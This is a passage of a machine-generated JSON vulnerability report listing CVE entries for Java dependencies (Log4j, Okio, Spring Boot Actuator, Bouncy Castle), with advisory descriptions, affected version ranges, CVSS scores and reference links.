Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.2"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity 
Exploit","url":"http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Dec/2"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Mar/23"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/10/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/13/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory 
ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-7rjr-3q55-vv33","url":"https://github.com/advisories/GHSA-7rjr-3q55-vv33"},{"summary":"Apache Advisory LOG4J2-3198","url":"https://issues.apache.org/jira/browse/LOG4J2-3198"},{"summary":"Apache Advisory LOG4J2-3201","url":"https://issues.apache.org/jira/browse/LOG4J2-3201"},{"summary":"Apache Advisory LOG4J2-3214","url":"https://issues.apache.org/jira/browse/LOG4J2-3214"},{"summary":"Apache Advisory LOG4J2-3221","url":"https://issues.apache.org/jira/browse/LOG4J2-3221"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM"},{"summary":"Apache Advisory changes-report","url":"https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0"},{"summary":"Apache Advisory lookups","url":"https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup"},{"summary":"Apache Advisory migration","url":"https://logging.apache.org/log4j/2.x/manual/migration.html"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Microsoft Advisory 
microsofts-response-to-cve-2021-44228-apache-log4j2","url":"https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44228"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211210-0007","url":"https://security.netapp.com/advisory/ntap-20211210-0007"},{"summary":"Apple Advisory HT213189","url":"https://support.apple.com/kb/HT213189"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Twitter Advisory 1469345530182455296","url":"https://twitter.com/kurtseifried/status/1469345530182455296"},{"summary":"Bentley Advisory be-2022-0001","url":"https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Nu11secur1ty Exploit","url":"https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":10.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":10.0,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":10.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"]}],"title":"CVE-2021-44228/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45105"]}],"cve":"CVE-2021-45105","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-18T18:00:07","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45105"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5024"},{"system_name":"NetApp Advisory","text":"ntap-20211218-0001"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-501673"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 
674"},{"category":"description","details":"Vulnerability Description","text":"Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion"},{"category":"details","details":"Vulnerability Details","text":"# Apache Log4j2 vulnerable to Improper Input Validation and Uncontrolled Recursion Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3. # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/19/1"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-501673","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory 
security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45105"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"NetApp Advisory ntap-20211218-0001","url":"https://security.netapp.com/advisory/ntap-20211218-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Debian Advisory dsa-5024","url":"https://www.debian.org/security/2021/dsa-5024"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Zero Day Initiative 
Exploit","url":"https://www.zerodayinitiative.com/advisories/ZDI-21-1541"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.6,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":8.6,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":8.6,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2021-45105/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9488"]}],"cve":"CVE-2020-9488","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2020-06-05T14:15:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-9488"},{"system_name":"Apache Advisory","text":"LOG4J2-2819"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"NetApp Advisory","text":"ntap-20200504-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper validation of certificate with host mismatch in Apache Log4j SMTP appender"},{"category":"details","details":"Vulnerability Details","text":"# Improper validation of 
certificate with host mismatch in Apache Log4j SMTP appender Improper validation of certificate with host mismatch in Apache Log4j SMTP appender prior to version 2.13.2. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.3"]},"references":[{"summary":"Apache Advisory LOG4J2-2819","url":"https://issues.apache.org/jira/browse/LOG4J2-2819"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a2699f724156a558afd1abb6c044fb9132caa66dce861b82699722a@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0df3d7a5acb98c57e64ab9266aa21eeee1d9b399addb96f9cf1cbe05@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1fc73f0e16ec2fa249d3ad39a5194afb9cc5afb4c023dc0bab5a5881@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r22a56beb76dd8cf18e24fda9072f1e05990f49d6439662d3782a392f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f209d271349bafd91537a558a279c08ebcff8fa3e547357d58833e6@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r33864a0fc171c1c4bf680645ebb6d4f8057899ab294a43e1e4fe9d04@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r393943de452406f0f6f4b3def9f8d3c071f96323c1f6ed1a098f7fe4@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r3d1d00441c55144a4013adda74b051ae7864128ebcfb6ee9721a2eb3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4285398e5585a0456d3d9db021a4fce6e6fcf3ec027dfa13a450ec98@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45916179811a32cbaa500f972de9098e6ee80ee81c7f134fce83e03a@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48bcd06049c1779ef709564544c3d8a32ae6ee5c3b7281a606ac4463@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r48efc7cb5aeb4e1f67aaa06fb4b5479a5635d12f07d0b93fc2d08809@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4d5dc9f3520071338d9ebc26f9f158a43ae28a91923d176b550a807b@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4db540cafc5d7232c62e076051ef661d37d345015b2e59b3f81a932f@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4ed1f49616a8603832d378cb9d13e7a8b9b27972bb46d946ccd8491f@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5a68258e5ab12532dc179edae3d6e87037fa3b50ab9d63a90c432507@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65578f3761a89bc164e8964acd5d913b9f8fd997967b195a89a97ca3@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7641ee788e1eb1be4bb206a7d15f8a64ec6ef23e5ec6132d5a567695@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache 
Mailing List","url":"https://lists.apache.org/thread.html/r7e739f2961753af95e2a3a637828fb88bfca68e5d6b0221d483a9ee5@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c001b9a95c0bbec06f4457721edd94935a55932e64b82cc5582b846@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9776e71e3c67c5d13a91c1eba0dc025b48b802eb7561cc6956d6961c@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9a79175c393d14d760a0ae3731b4a873230a16ef321aa9ca48a810cd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra051e07a0eea4943fa104247e69596f094951f51512d42c924e86c75@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra632b329b2ae2324fabbad5da204c4ec2e171ff60348ec4ba698fd40@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc45eb0f53fd6242af3e666c2189464f848a851d408289840cecc6e3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc6b81c013618d1de1b5d6b8c1088aaf87b4bacc10c2371f15a566701@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd55f65c6822ff235eda435d31488cfbb9aa7055cdf47481ebee777cc@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd8e87c4d69df335d0ba7d815b63be8bd8a6352f429765c52eb07ddac@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re024d86dffa72ad800f2848d0c77ed93f0b78ee808350b477a6ed987@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rec34b1cccf907898e7cb36051ffac3ccf1ea89d0b261a2a3b3fb267f@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1c2a81a08034c688b8f15cf58a4cfab322d00002ca46d20133bee20@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00017.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9488"},{"summary":"NetApp Advisory ntap-20200504-0003","url":"https://security.netapp.com/advisory/ntap-20200504-0003"},{"summary":"Debian Advisory dsa-5020","url":"https://www.debian.org/security/2021/dsa-5020"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory 
cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":3.7,"baseSeverity":"LOW","confidentialityImpact":"LOW","environmentalScore":3.7,"environmentalSeverity":"LOW","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":3.7,"temporalSeverity":"LOW","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4.0|<2.12.3"]}],"title":"CVE-2020-9488/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-3635"]}],"cve":"CVE-2023-3635","cwe":{"id":"195","name":"Signed to Unsigned Conversion Error"},"discovery_date":"2023-07-12T21:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2023-3635"},{"system_name":"JFrog Advisory","text":"okio-gzip-source-unhandled-exception-dos-xray-523195"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Conversion between Numeric Types","title":"Additional CWE: 681"},{"category":"description","details":"Vulnerability Description","text":"Okio Signed to Unsigned 
Conversion Error vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Okio Signed to Unsigned Conversion Error vulnerability GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class."}],"product_status":{"known_affected":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-3635"},{"summary":"JFrog Advisory okio-gzip-source-unhandled-exception-dos-xray-523195","url":"https://research.jfrog.com/vulnerabilities/okio-gzip-source-unhandled-exception-dos-xray-523195"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.squareup.okio/okio@vers:maven/>=0.5.0|<=1.17.5"]}],"title":"CVE-2023-3635/pkg:maven/com.squareup.okio/okio@1.6.0?type=jar"},{"cve":"CVE-2023-34055","discovery_date":"2023-11-28T09:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2023-34055"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"system_name":"NetApp 
Advisory","text":"ntap-20231221-0010"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Actuator denial of service vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Actuator denial of service vulnerability In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition. Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC or Spring WebFlux * `org.springframework.boot:spring-boot-actuator` is on the classpath"}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-34055"},{"summary":"NetApp Advisory ntap-20231221-0010","url":"https://security.netapp.com/advisory/ntap-20231221-0010"},{"summary":"Snyk Advisory SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862","url":"https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862"},{"summary":"Cve 
2023","url":"https://spring.io/security/cve-2023-34055"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.springframework.boot/spring-boot-actuator@vers:maven/>=1.0.0.RELEASE|<=2.7.9"]}],"title":"CVE-2023-34055/pkg:maven/org.springframework.boot/spring-boot-actuator@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-15522"]}],"cve":"CVE-2020-15522","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-08-13T15:22:31","ids":[{"system_name":"CVE Record","text":"CVE-2020-15522"},{"system_name":"NetApp Advisory","text":"ntap-20210622-0007"}],"notes":[{"audience":"developers","category":"other","text":"Concurrent Execution using Shared Resource with Improper Synchronization","title":"Additional CWE: 362"},{"category":"description","details":"Vulnerability Description","text":"Timing based private key exposure in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Timing based private key exposure in Bouncy Castle Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing 
